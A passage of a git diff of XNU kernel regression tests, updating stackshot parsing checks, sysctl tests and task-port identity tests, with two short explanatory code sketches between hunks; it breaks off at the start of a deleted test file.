                T_QUIET; T_ASSERT_GT(translated_child_pid, 0, "translated child pid greater than zero");
        }
-       
+
        kcdata_iter_t iter = kcdata_iter(ssbuf, sslen);
        if (delta) {
                T_ASSERT_EQ(kcdata_iter_type(iter), KCDATA_BUFFER_BEGIN_DELTA_STACKSHOT,
@@ -1787,7 +1985,7 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                        uint64_t *data;
                        char *desc;
                        for (int i = 0; i < 3; i ++) {
-                               kcdata_iter_get_data_with_desc(iter, &desc, &data, NULL);
+                               kcdata_iter_get_data_with_desc(iter, &desc, (void **)&data, NULL);
                                if (strcmp(desc, "kcd_c_type") == 0) {
                                        compression_type = *data;
                                } else if (strcmp(desc, "kcd_c_totalout") == 0){
@@ -1799,14 +1997,14 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                                iter = kcdata_iter_next(iter);
                        }
 
-                       T_ASSERT_EQ(compression_type, 1, "zlib compression is used");
-                       T_ASSERT_GT(totalout, 0, "successfully gathered how long the compressed buffer is");
-                       T_ASSERT_GT(totalin, 0, "successfully gathered how long the uncompressed buffer will be at least");
+                       T_ASSERT_EQ(compression_type, UINT64_C(1), "zlib compression is used");
+                       T_ASSERT_GT(totalout, UINT64_C(0), "successfully gathered how long the compressed buffer is");
+                       T_ASSERT_GT(totalin, UINT64_C(0), "successfully gathered how long the uncompressed buffer will be at least");
 
                        /* progress to the next kcdata item */
                        T_ASSERT_EQ(kcdata_iter_type(iter), KCDATA_BUFFER_BEGIN_STACKSHOT, "compressed stackshot found");
 
-                       void *bufferBase = kcdata_iter_payload(iter);
+                       char *bufferBase = kcdata_iter_payload(iter);
 
                        /*
                         * zlib is used, allocate a buffer based on the metadata, plus
@@ -1819,22 +2017,28 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                        z_stream zs;
                        memset(&zs, 0, sizeof(zs));
                        T_QUIET; T_ASSERT_EQ(inflateInit(&zs), Z_OK, "inflateInit OK");
-                       zs.next_in = bufferBase;
-                       zs.avail_in = totalout;
-                       zs.next_out = inflatedBufferBase;
-                       zs.avail_out = inflatedBufferSize;
+                       zs.next_in = (unsigned char *)bufferBase;
+                       T_QUIET; T_ASSERT_LE(totalout, (uint64_t)UINT_MAX, "stackshot is not too large");
+                       zs.avail_in = (uInt)totalout;
+                       zs.next_out = (unsigned char *)inflatedBufferBase;
+                       T_QUIET; T_ASSERT_LE(inflatedBufferSize, (size_t)UINT_MAX, "output region is not too large");
+                       zs.avail_out = (uInt)inflatedBufferSize;
                        T_ASSERT_EQ(inflate(&zs, Z_FINISH), Z_STREAM_END, "inflated buffer");
                        inflateEnd(&zs);
 
-                       T_ASSERT_EQ(zs.total_out, totalin, "expected number of bytes inflated");
+                       T_ASSERT_EQ((uint64_t)zs.total_out, totalin, "expected number of bytes inflated");
                        
                        /* copy the data after the compressed area */
-                       T_QUIET; T_ASSERT_LE(sslen - totalout - (bufferBase - ssbuf),
+                       T_QUIET; T_ASSERT_GE((void *)bufferBase, ssbuf,
+                                       "base of compressed stackshot is after the returned stackshot buffer");
+                       size_t header_size = (size_t)(bufferBase - (char *)ssbuf);
+                       size_t data_after_compressed_size = sslen - totalout - header_size;
+                       T_QUIET; T_ASSERT_LE(data_after_compressed_size,
                                        inflatedBufferSize - zs.total_out,
                                        "footer fits in the buffer");
                        memcpy(inflatedBufferBase + zs.total_out,
                                        bufferBase + totalout,
-                                       sslen - totalout - (bufferBase - ssbuf));
+                                       data_after_compressed_size);
 
                        iter = kcdata_iter(inflatedBufferBase, inflatedBufferSize);
                }
@@ -1931,21 +2135,61 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                                        id uuid = ptr[@"imageUUID"];
 
                                        uint8_t uuid_p[16];
-                                       for (int i = 0; i < 16; i ++)
-                                               uuid_p[i] = (uint8_t) ([[uuid objectAtIndex:i] intValue]);
+                                       for (unsigned int i = 0; i < 16; i ++) {
+                                               NSNumber *uuidByte = uuid[i];
+                                               uuid_p[i] = (uint8_t)uuidByte.charValue;
+                                       }
 
                                        check_shared_cache_uuid(uuid_p);
 
+                                       uint64_t baseAddress = (uint64_t)((NSNumber *)ptr[@"imageSlidBaseAddress"]).longLongValue;
+                                       uint64_t firstMapping = (uint64_t)((NSNumber *)ptr[@"sharedCacheSlidFirstMapping"]).longLongValue;
+
+                                       T_ASSERT_LE(baseAddress, firstMapping,
+                                               "in per-task shared_cache_dyld_load_info, "
+                                               "baseAddress <= firstMapping");
+                                       T_ASSERT_GE(baseAddress + (1ull << 29), firstMapping,
+                                               "in per-task shared_cache_dyld_load_info, "
+                                               "baseAddress + 512meg >= firstMapping");
+
+                                       size_t shared_cache_len;
+                                       const void *addr = _dyld_get_shared_cache_range(&shared_cache_len);
+                                       T_ASSERT_EQ((uint64_t)addr, firstMapping,
+                                                       "SlidFirstMapping should match shared_cache_range");
+
                                        /* 
                                         * check_shared_cache_uuid() will assert on failure, so if
                                         * we get here, then we have found the shared cache UUID
                                         * and it's correct
                                         */
-                                       found_shared_cache_uuid =  true;
+                                       found_shared_cache_uuid = true;
+                               }
+                       }
+                       if (expect_sharedcache_child) {
+                               uint64_t task_flags = [task_snapshot[@"ts_ss_flags"] unsignedLongLongValue];
+                               uint64_t sharedregion_flags = (task_flags & (kTaskSharedRegionNone | kTaskSharedRegionSystem | kTaskSharedRegionOther));
+                               id sharedregion_info = container[@"task_snapshots"][@"shared_cache_dyld_load_info"];
+                               if (!found_sharedcache_badflags) {
+                                       T_QUIET; T_ASSERT_NE(sharedregion_flags, 0ll, "one of the kTaskSharedRegion flags should be set on all tasks");
+                                       bool multiple = (sharedregion_flags & (sharedregion_flags - 1)) != 0;
+                                       T_QUIET; T_ASSERT_FALSE(multiple, "only one kTaskSharedRegion flag should be set on each task");
+                                       found_sharedcache_badflags = (sharedregion_flags == 0 || multiple);
+                               }
+                               if (pid == 0) {
+                                       T_ASSERT_EQ(sharedregion_flags, (uint64_t)kTaskSharedRegionNone, "Kernel proc (pid 0) should have no shared region");
+                               } else if (pid == sharedcache_child_pid) {
+                                       found_sharedcache_child = true;
+                                       sharedcache_child_flags = sharedregion_flags;
+                               } else if (pid == getpid()) {
+                                       found_sharedcache_self = true;
+                                       sharedcache_self_flags = sharedregion_flags;
+                               }
+                               if (sharedregion_flags == kTaskSharedRegionOther && !(task_flags & kTaskSharedRegionInfoUnavailable)) {
+                                       T_QUIET; T_ASSERT_NOTNULL(sharedregion_info, "kTaskSharedRegionOther should have a shared_cache_dyld_load_info struct");
+                               } else {
+                                       T_QUIET; T_ASSERT_NULL(sharedregion_info, "expect no shared_cache_dyld_load_info struct");
                                }
                        }
-                       
-                       
                        if (expect_zombie_child && (pid == zombie_child_pid)) {
                                found_zombie_child = true;
                                
@@ -1959,7 +2203,7 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                                found_translated_child = true;
                                
                                uint64_t task_flags = [task_snapshot[@"ts_ss_flags"] unsignedLongLongValue];
-                               T_ASSERT_EQ((task_flags & kTaskIsTranslated), kTaskIsTranslated, "child marked as translated");
+                               T_EXPECT_BITS_SET(task_flags, kTaskIsTranslated, "child marked as translated");
                                
                                continue;
                        }
@@ -1968,7 +2212,10 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                                NSArray *winfos = container[@"task_snapshots"][@"thread_waitinfo"];
 
                                for (id i in winfos) {
-                                       if ([i[@"wait_type"] intValue] == kThreadWaitCompressor && [i[@"owner"] intValue] == cseg_expected_threadid) {
+                                       NSNumber *waitType = i[@"wait_type"];
+                                       NSNumber *owner = i[@"owner"];
+                                       if (waitType.intValue == kThreadWaitCompressor &&
+                                                       owner.unsignedLongValue == cseg_expected_threadid) {
                                                found_cseg_waitinfo = true;
                                                break;
                                        }
@@ -1978,16 +2225,27 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                        if (expect_srp_waitinfo) {
                                NSArray *tinfos = container[@"task_snapshots"][@"thread_turnstileinfo"];
                                NSArray *winfos = container[@"task_snapshots"][@"thread_waitinfo"];
-
                                for (id i in tinfos) {
                                        if (!found_srp_waitinfo) {
-                                               if ([i[@"turnstile_context"] intValue] == srp_expected_pid &&
-                                                               ([i[@"turnstile_flags"] intValue] & STACKSHOT_TURNSTILE_STATUS_BLOCKED_ON_TASK)) {
-
-                                                       /* we found something that is blocking the correct pid */
+                                               bool found_thread = false;
+                                               bool found_pid = false;
+                                               if (([i[@"turnstile_flags"] intValue] & STACKSHOT_TURNSTILE_STATUS_THREAD) &&
+                                                   [i[@"turnstile_context"] unsignedLongLongValue] == srp_expected_threadid &&
+                                                   srp_expected_threadid != 0) {
+                                                       found_thread = true;
+                                               }
+                                               if (([i[@"turnstile_flags"] intValue] & STACKSHOT_TURNSTILE_STATUS_BLOCKED_ON_TASK) &&
+                                                   [i[@"turnstile_context"] intValue] == srp_expected_pid &&
+                                                   srp_expected_pid != -1) {
+                                                       found_pid = true;
+                                               }
+                                               if (found_pid || found_thread) {
+                                                       T_LOG("found SRP %s %lld waiter: %d", (found_thread ? "thread" : "pid"),
+                                                           [i[@"turnstile_context"] unsignedLongLongValue], [i[@"waiter"] intValue]);
+                                                       /* we found something that is blocking the correct threadid */
                                                        for (id j in winfos) {
                                                                if ([j[@"waiter"] intValue] == [i[@"waiter"] intValue] &&
-                                                                               [j[@"wait_type"] intValue] == kThreadWaitPortReceive) {
+                                                                   [j[@"wait_type"] intValue] == kThreadWaitPortReceive) {
                                                                        found_srp_waitinfo = true;
                                                                        break;
                                                                }
@@ -2010,8 +2268,8 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                                        "current process name matches in stackshot");
 
                        uint64_t task_flags = [task_snapshot[@"ts_ss_flags"] unsignedLongLongValue];
-                       T_ASSERT_NE((task_flags & kTerminatedSnapshot), kTerminatedSnapshot, "current process not marked as terminated");
-                       T_ASSERT_NE((task_flags & kTaskIsTranslated), kTaskIsTranslated, "current process not marked as translated");
+                       T_ASSERT_BITS_NOTSET(task_flags, kTerminatedSnapshot, "current process not marked as terminated");
+                       T_ASSERT_BITS_NOTSET(task_flags, kTaskIsTranslated, "current process not marked as translated");
 
                        T_QUIET;
                        T_EXPECT_LE(pid, [task_snapshot[@"ts_unique_pid"] intValue],
@@ -2032,6 +2290,7 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
 
                        bool found_main_thread = false;
                        uint64_t main_thread_id = -1ULL;
+                       bool found_null_kernel_frame = false;
                        for (id thread_key in container[@"task_snapshots"][@"thread_snapshots"]) {
                                NSMutableDictionary *thread = container[@"task_snapshots"][@"thread_snapshots"][thread_key];
                                NSDictionary *thread_snap = thread[@"thread_snapshot"];
@@ -2057,8 +2316,17 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                                                        [cpu_times[@"user_time"] intValue],
                                                        "runnable time of current thread is valid");
                                }
+                               if (!found_null_kernel_frame) {
+                                       for (NSNumber *frame in thread[@"kernel_frames"]) {
+                                               if (frame.unsignedLongValue == 0) {
+                                                       found_null_kernel_frame = true;
+                                                       break;
+                                               }
+                                       }
+                               }
                        }
                        T_EXPECT_TRUE(found_main_thread, "found main thread for current task in stackshot");
+                       T_EXPECT_FALSE(found_null_kernel_frame, "should not see any NULL kernel frames");
 
                        if (expect_turnstile_lock && !found_turnstile_lock) {
                                NSArray *tsinfos = container[@"task_snapshots"][@"thread_turnstileinfo"];
@@ -2073,10 +2341,22 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                        break;
                }
                case STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO: {
-                       struct dyld_uuid_info_64_v2 *payload = kcdata_iter_payload(iter);
-                       T_ASSERT_EQ(kcdata_iter_size(iter), sizeof(*payload), "valid dyld_uuid_info_64_v2 struct");
+                       struct dyld_shared_cache_loadinfo *payload = kcdata_iter_payload(iter);
+                       T_ASSERT_EQ((size_t)kcdata_iter_size(iter), sizeof(*payload), "valid dyld_shared_cache_loadinfo struct");
+
+                       check_shared_cache_uuid(payload->sharedCacheUUID);
+
+                       T_ASSERT_LE(payload->sharedCacheUnreliableSlidBaseAddress,
+                               payload->sharedCacheSlidFirstMapping,
+                               "SlidBaseAddress <= SlidFirstMapping");
+                       T_ASSERT_GE(payload->sharedCacheUnreliableSlidBaseAddress + (1ull << 29),
+                               payload->sharedCacheSlidFirstMapping,
+                               "SlidFirstMapping should be within 512megs of SlidBaseAddress");
 
-                       check_shared_cache_uuid(payload->imageUUID);
+                       size_t shared_cache_len;
+                       const void *addr = _dyld_get_shared_cache_range(&shared_cache_len);
+                       T_ASSERT_EQ((uint64_t)addr, payload->sharedCacheSlidFirstMapping,
+                           "SlidFirstMapping should match shared_cache_range");
 
                        /* 
                         * check_shared_cache_uuid() asserts on failure, so we must have
@@ -2088,6 +2368,19 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                }
        }
 
+       if (expect_sharedcache_child) {
+               T_QUIET; T_ASSERT_TRUE(found_sharedcache_child, "found sharedcache child in kcdata");
+               T_QUIET; T_ASSERT_TRUE(found_sharedcache_self, "found self in kcdata");
+               if (found_sharedcache_child && found_sharedcache_self) {
+                       T_QUIET; T_ASSERT_NE(sharedcache_child_flags, (uint64_t)kTaskSharedRegionNone, "sharedcache child should have shared region");
+                       T_QUIET; T_ASSERT_NE(sharedcache_self_flags, (uint64_t)kTaskSharedRegionNone, "sharedcache: self should have shared region");
+                       if (sharedcache_self_flags == kTaskSharedRegionSystem && !sharedcache_child_sameaddr) {
+                               /* If we're in the system shared region, and the child has a different address, child must have an Other shared region */
+                               T_ASSERT_EQ(sharedcache_child_flags, (uint64_t)kTaskSharedRegionOther, 
+                                   "sharedcache child should have Other shared region");
+                       }
+               }
+       }
        if (expect_zombie_child) {
                T_QUIET; T_ASSERT_TRUE(found_zombie_child, "found zombie child in kcdata");
        }
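For context, the two dyld calls the new checks rely on, _dyld_get_shared_cache_uuid() and _dyld_get_shared_cache_range() from <mach-o/dyld.h>, can also be exercised on their own; a minimal standalone sketch, not part of this commit:

    #include <mach-o/dyld.h>
    #include <stdio.h>
    #include <uuid/uuid.h>

    int
    main(void)
    {
            uuid_t uuid;
            uuid_string_t str;
            size_t len = 0;
            const void *base;

            /* UUID of the shared cache this process is running against */
            if (_dyld_get_shared_cache_uuid(uuid)) {
                    uuid_unparse_upper(uuid, str);
                    printf("shared cache UUID:  %s\n", str);
            }

            /* Slid address and length of the shared cache mapping */
            base = _dyld_get_shared_cache_range(&len);
            if (base != NULL) {
                    printf("shared cache range: %p + 0x%zx\n", base, len);
            }
            return 0;
    }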
index cedc9f7ece8b4ac4103df7cf935e906242959a38..c8f26eb5a4888b2849826cd888c62fc3d754ae6d 100644 (file)
@@ -89,7 +89,18 @@ main_test(void)
        T_EXPECT_EQ(out_buffer->entries, 1ULL, "should have 1 vm object\n");
        T_EXPECT_NE(out_buffer->data[0].object_id, 0ULL, "vm_object_id should not be 0\n");
 
-       /* get the list for the current process */
+       /* get the list for the current process with an overly large size */
+       out_size = SIZE_MAX;
+       memset(out_buffer, 0, output_size);
+       ret = sysctlbyname(g_sysctl_name, out_buffer, &out_size, &task_name, sizeof(task_name));
+
+       T_QUIET;
+       T_EXPECT_EQ(ret, 0, "sysctlbyname failed\n");
+       T_EXPECT_EQ(out_size, 2 * sizeof(vm_object_query_data_t) + sizeof(int64_t), "sysctl return size is incorrect\n");
+       T_EXPECT_EQ(out_buffer->entries, 2ULL, "should have 2 vm objects\n");
+       T_EXPECT_NE(out_buffer->data[0].object_id, 0ULL, "vm_object_id should not be 0\n");
+
+       /* get the list for the current process with the correct output size */
        out_size = output_size;
        memset(out_buffer, 0, output_size);
        ret = sysctlbyname(g_sysctl_name, out_buffer, &out_size, &task_name, sizeof(task_name));
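The over-sized probe added above complements the usual two-step sysctl sizing idiom; a hypothetical sketch that would slot into the same test body, reusing its g_sysctl_name and task_name (whether this particular sysctl reports a size for a NULL buffer is an assumption):

    size_t needed = 0;
    void *buf = NULL;

    /* First call with a NULL buffer: many sysctls report the required size. */
    if (sysctlbyname(g_sysctl_name, NULL, &needed, &task_name, sizeof(task_name)) == 0 && needed > 0) {
            buf = malloc(needed);
            T_QUIET; T_ASSERT_NOTNULL(buf, "allocate sysctl buffer");
            /* Second call with a correctly sized buffer. */
            T_ASSERT_POSIX_SUCCESS(sysctlbyname(g_sysctl_name, buf, &needed, &task_name, sizeof(task_name)),
                "sized sysctlbyname");
            free(buf);
    }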
index 823e1123ff5ca98ed4616bfc8ddd3a96da3ed753..de9329a37c63e6dab9a14af4e5e93de64a18ad46 100644 (file)
@@ -5,6 +5,8 @@ T_DECL(sysctl_hw_cpu, "ensure vital product and CPU-related sysctls exist")
 {
        char buffer[64] = "";
        size_t buffer_size = sizeof(buffer);
+       int v;
+       size_t v_size;
 
        int ret = sysctlbyname("hw.target", buffer,
            &buffer_size, NULL, 0);
@@ -25,4 +27,15 @@ T_DECL(sysctl_hw_cpu, "ensure vital product and CPU-related sysctls exist")
 
        T_ASSERT_POSIX_SUCCESS(ret, "machdep.cpu.brand_string sysctl");
        T_LOG("machdep.cpu.brand_string = %s", buffer);
+
+       v = 0;
+       v_size = sizeof(v);
+       ret = sysctlbyname("hw.cpu64bit_capable", &v, &v_size, NULL, 0);
+       T_ASSERT_POSIX_SUCCESS(ret, "hw.cpu64bit_capable");
+
+#if __arm__
+       T_EXPECT_EQ(v, 0, "cpu is not 64 bit capable");
+#else
+       T_EXPECT_EQ(v, 1, "cpu is 64 bit capable");
+#endif
 }
index 2398d67f5e748056f4ed80a74c0650f61f887c24..da1e64ce342a31a2346215a16cb095651d9796e8 100644 (file)
@@ -6,5 +6,13 @@
         <true/>
         <key>task_for_pid-allow</key>
         <true/>
+
+        <key>com.apple.system-task-ports.control</key>
+        <!-- Supersedes the two above in AzulE+, cross-platform -->
+       <true/>
+
+        <key>com.apple.security.get-movable-control-port</key>
+        <!-- Allows for task_get_special_port(..TASK_KERNEL_PORT..) -->
+       <true/>
 </dict>
 </plist>
diff --git a/tests/task_ident_test.c b/tests/task_ident_test.c
new file mode 100644 (file)
index 0000000..8fab0e9
--- /dev/null
@@ -0,0 +1,62 @@
+#include <darwintest.h>
+#include <darwintest_utils.h>
+#include <errno.h>
+#include <mach/mach.h>
+#include <mach/mach_types.h>
+#include <mach/task.h>
+#include <mach/mach_error.h>
+#include <mach/task_special_ports.h>
+
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+T_DECL(task_ident, "test task identity token")
+{
+       kern_return_t kr;
+       task_id_token_t token;
+       mach_port_t port1, port2;
+
+       kr = task_create_identity_token(mach_task_self(), &token);
+       T_ASSERT_MACH_SUCCESS(kr, "task_create_identity_token()");
+
+       port1 = mach_task_self();
+       kr = task_identity_token_get_task_port(token, TASK_FLAVOR_CONTROL, &port2); /* Immovable control port for self */
+       T_ASSERT_MACH_SUCCESS(kr, "task_identity_token_get_task_port() - CONTROL");
+       T_EXPECT_EQ(port1, port2, "Control port does not match!");
+
+       mach_port_deallocate(mach_task_self(), port2);
+
+       kr = task_get_special_port(mach_task_self(), TASK_READ_PORT, &port1);
+       T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port() - READ");
+       kr = task_identity_token_get_task_port(token, TASK_FLAVOR_READ, &port2);
+       T_ASSERT_MACH_SUCCESS(kr, "task_identity_token_get_task_port() - read");
+       T_EXPECT_EQ(port1, port2, "Read port does not match!");
+
+       mach_port_deallocate(mach_task_self(), port1);
+       mach_port_deallocate(mach_task_self(), port2);
+
+       kr = task_get_special_port(mach_task_self(), TASK_INSPECT_PORT, &port1);
+       T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port() - INSPECT");
+       kr = task_identity_token_get_task_port(token, TASK_FLAVOR_INSPECT, &port2);
+       T_ASSERT_MACH_SUCCESS(kr, "task_identity_token_get_task_port() - inspect");
+       T_EXPECT_EQ(port1, port2, "Inspect port does not match!");
+
+       mach_port_deallocate(mach_task_self(), port1);
+       mach_port_deallocate(mach_task_self(), port2);
+
+       kr = task_get_special_port(mach_task_self(), TASK_NAME_PORT, &port1);
+       T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port() - NAME");
+       kr = task_identity_token_get_task_port(token, TASK_FLAVOR_NAME, &port2);
+       T_ASSERT_MACH_SUCCESS(kr, "task_identity_token_get_task_port() - name");
+       T_EXPECT_EQ(port1, port2, "Name port does not match!");
+
+       mach_port_deallocate(mach_task_self(), port1);
+       mach_port_deallocate(mach_task_self(), port2);
+
+       kr = task_identity_token_get_task_port(mach_thread_self(), TASK_FLAVOR_NAME, &port2);
+       T_EXPECT_NE(kr, KERN_SUCCESS, "task_identity_token_get_task_port() should fail on non-token port");
+
+       mach_port_deallocate(mach_task_self(), token);
+}
index a40a5d569ed098174dec3f659a94c4222ba49240..f887beee6fee80820c1c69426e848d0f0440fd93 100644 (file)
@@ -13,6 +13,8 @@
 #include <sys/sysctl.h>
 #include <unistd.h>
 
+#include "test_utils.h"
+
 T_GLOBAL_META(T_META_RUN_CONCURRENTLY(true));
 
 /* *************************************************************************************
@@ -51,7 +53,6 @@ void test_task_basic_info_32(void);
 void test_task_basic_info_64(void);
 void task_basic_info_32_debug(void);
 void task_basic2_info_32_warmup(void);
-static int is_development_kernel(void);
 void test_task_basic_info(enum info_kind kind);
 uint64_t info_get(enum info_kind kind, enum info_get get, void * data);
 
@@ -1144,28 +1145,3 @@ info_get(enum info_kind kind, enum info_get get, void * data)
 
        __builtin_unreachable();
 }
-
-/*
- * Determines whether we're running on a development kernel
- */
-static int
-is_development_kernel(void)
-{
-#define NOTSET -1
-
-       static int is_dev = NOTSET;
-
-       if (is_dev == NOTSET) {
-               int dev;
-               size_t dev_size = sizeof(dev);
-
-               T_QUIET;
-               T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.development", &dev, &dev_size, NULL, 0), NULL);
-               is_dev = (dev != 0);
-
-               return is_dev;
-       } else {
-               return is_dev;
-       }
-#undef NOTSET
-}
diff --git a/tests/task_inspect.c b/tests/task_inspect.c
deleted file mode 100644 (file)
index b9fbe2e..0000000
+++ /dev/null
@@ -1,146 +0,0 @@
-#ifdef T_NAMESPACE
-#undef T_NAMESPACE
-#endif
-
-#include <darwintest.h>
-
-#include <mach/host_priv.h>
-#include <mach/mach.h>
-#include <mach/mach_types.h>
-#include <mach/mach_vm.h>
-#include <mach/processor_set.h>
-#include <mach/task.h>
-#include <sys/sysctl.h>
-#include <unistd.h>
-
-T_GLOBAL_META(T_META_NAMESPACE("xnu.ipc"),
-    T_META_RUN_CONCURRENTLY(true));
-
-/*
- * Attempt to inspect kernel_task using a task_inspect_t.  Interact with the
- * kernel in the same way top(1) and lsmp(1) do.
- */
-
-static void
-check_secure_kernel(void)
-{
-       int secure_kern = 0;
-       size_t secure_kern_size = sizeof(secure_kern);
-
-       T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.secure_kernel", &secure_kern,
-           &secure_kern_size, NULL, 0), NULL);
-
-       if (secure_kern) {
-               T_SKIP("secure kernel: processor_set_tasks will not return kernel_task");
-       }
-}
-
-static void
-attempt_kernel_inspection(task_t task)
-{
-       pid_t pid = (pid_t)-1;
-       mach_msg_type_number_t i, count, thcnt;
-       struct task_basic_info_64 ti;
-       thread_act_array_t threads;
-
-       T_QUIET;
-       T_EXPECT_MACH_SUCCESS(pid_for_task(task, &pid), NULL);
-       T_LOG("Checking pid %d", pid);
-
-       if (pid != 0) {
-               return;
-       }
-
-       T_LOG("found kernel_task, attempting to inspect");
-
-       count = TASK_BASIC_INFO_64_COUNT;
-       T_EXPECT_MACH_SUCCESS(task_info(task, TASK_BASIC_INFO_64, (task_info_t)&ti,
-           &count), "task_info(... TASK_BASIC_INFO_64 ...)");
-
-       T_EXPECT_MACH_SUCCESS(task_threads(task, &threads, &thcnt), "task_threads");
-       T_LOG("Found %d kernel threads.", thcnt);
-       for (i = 0; i < thcnt; i++) {
-               kern_return_t kr;
-               thread_basic_info_data_t basic_info;
-               mach_msg_type_number_t bi_count = THREAD_BASIC_INFO_COUNT;
-
-               kr = thread_info(threads[i], THREAD_BASIC_INFO,
-                   (thread_info_t)&basic_info, &bi_count);
-               /*
-                * Ignore threads that have gone away.
-                */
-               if (kr == MACH_SEND_INVALID_DEST) {
-                       T_LOG("ignoring thread that has been destroyed");
-                       continue;
-               }
-               T_EXPECT_MACH_SUCCESS(kr, "thread_info(... THREAD_BASIC_INFO ...)");
-               (void)mach_port_deallocate(mach_task_self(), threads[i]);
-       }
-       mach_vm_deallocate(mach_task_self(),
-           (mach_vm_address_t)(uintptr_t)threads,
-           thcnt * sizeof(*threads));
-
-       ipc_info_space_basic_t basic_info;
-       T_EXPECT_MACH_SUCCESS(mach_port_space_basic_info(task, &basic_info), "mach_port_space_basic_info");
-
-       ipc_info_space_t info_space;
-       ipc_info_name_array_t table;
-       ipc_info_tree_name_array_t tree;
-       mach_msg_type_number_t tblcnt = 0, treecnt = 0;
-       T_EXPECT_MACH_SUCCESS(mach_port_space_info(task, &info_space, &table,
-           &tblcnt, &tree, &treecnt), "mach_port_space_info");
-       if (tblcnt > 0) {
-               mach_vm_deallocate(mach_task_self(),
-                   (mach_vm_address_t)(uintptr_t)table,
-                   tblcnt * sizeof(*table));
-       }
-       if (treecnt > 0) {
-               mach_vm_deallocate(mach_task_self(),
-                   (mach_vm_address_t)(uintptr_t)tree,
-                   treecnt * sizeof(*tree));
-       }
-
-       T_END;
-}
-
-T_DECL(inspect_kernel_task,
-    "ensure that kernel task can be inspected",
-    T_META_CHECK_LEAKS(false),
-    T_META_ASROOT(true))
-{
-       processor_set_name_array_t psets;
-       processor_set_t pset;
-       task_array_t tasks;
-       mach_msg_type_number_t i, j, tcnt, pcnt = 0;
-       mach_port_t self = mach_host_self();
-
-       check_secure_kernel();
-
-       T_ASSERT_MACH_SUCCESS(host_processor_sets(self, &psets, &pcnt),
-           NULL);
-
-       for (i = 0; i < pcnt; i++) {
-               T_ASSERT_MACH_SUCCESS(host_processor_set_priv(self, psets[i], &pset), NULL);
-               T_LOG("Checking pset %d/%d", i, pcnt - 1);
-
-               tcnt = 0;
-               T_ASSERT_MACH_SUCCESS(processor_set_tasks(pset, &tasks, &tcnt), NULL);
-
-               for (j = 0; j < tcnt; j++) {
-                       attempt_kernel_inspection(tasks[j]);
-                       mach_port_deallocate(self, tasks[j]);
-               }
-
-               /* free tasks array */
-               mach_vm_deallocate(mach_task_self(),
-                   (mach_vm_address_t)(uintptr_t)tasks,
-                   tcnt * sizeof(*tasks));
-               mach_port_deallocate(mach_task_self(), pset);
-               mach_port_deallocate(mach_task_self(), psets[i]);
-       }
-       mach_vm_deallocate(mach_task_self(),
-           (mach_vm_address_t)(uintptr_t)psets,
-           pcnt * sizeof(*psets));
-
-       T_FAIL("could not find kernel_task in list of tasks returned");
-}
diff --git a/tests/task_inspect.entitlements b/tests/task_inspect.entitlements
deleted file mode 100644 (file)
index eaaf1de..0000000
+++ /dev/null
@@ -1,10 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-       <key>com.apple.system-task-ports</key>
-       <true/>
-       <key>task_for_pid-allow</key>
-       <true/>
-</dict>
-</plist>
diff --git a/tests/task_is_self.c b/tests/task_is_self.c
new file mode 100644 (file)
index 0000000..9882c46
--- /dev/null
@@ -0,0 +1,25 @@
+#include <darwintest.h>
+#include <mach/mach.h>
+#include <mach/task.h>
+#include <mach/mach_init.h>
+
+T_DECL(mach_task_is_self,
+    "test task port comparison check")
+{
+       mach_port_t self_insp, self_read, self_name, port;
+
+       T_ASSERT_MACH_SUCCESS(task_get_special_port(mach_task_self(), TASK_READ_PORT, &self_read), "task_get_special_port failed");
+       T_ASSERT_MACH_SUCCESS(task_get_special_port(mach_task_self(), TASK_INSPECT_PORT, &self_insp), "task_get_special_port failed");
+       T_ASSERT_MACH_SUCCESS(task_get_special_port(mach_task_self(), TASK_NAME_PORT, &self_name), "task_get_special_port failed");
+
+       T_ASSERT_MACH_SUCCESS(mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port), "mach_port_allocate failed");
+
+       T_EXPECT_NE(self_read, self_insp, "read and inspect port should be different");
+       T_EXPECT_NE(self_read, mach_task_self(), "read and control port should be different");
+
+       T_EXPECT_EQ(1, mach_task_is_self(mach_task_self()), "control port should point to self");
+       T_EXPECT_EQ(1, mach_task_is_self(self_read), "read port should point to self");
+       T_EXPECT_EQ(1, mach_task_is_self(self_insp), "inspect port should point to self");
+       T_EXPECT_EQ(1, mach_task_is_self(self_name), "name port should point to self");
+       T_EXPECT_NE(1, mach_task_is_self(port), "_port_ should not point to self");
+}
diff --git a/tests/test_dext_launch_56101852.c b/tests/test_dext_launch_56101852.c
deleted file mode 100644 (file)
index 99ad782..0000000
+++ /dev/null
@@ -1,101 +0,0 @@
-#include <darwintest.h>
-#include <CoreFoundation/CoreFoundation.h>
-#include <IOKit/kext/KextManager.h>
-#include <mach/mach_time.h>
-#include <sys/sysctl.h>
-#include <copyfile.h>
-#include <removefile.h>
-
-T_GLOBAL_META(T_META_NAMESPACE("xnu.iokit"),
-    T_META_RUN_CONCURRENTLY(true));
-
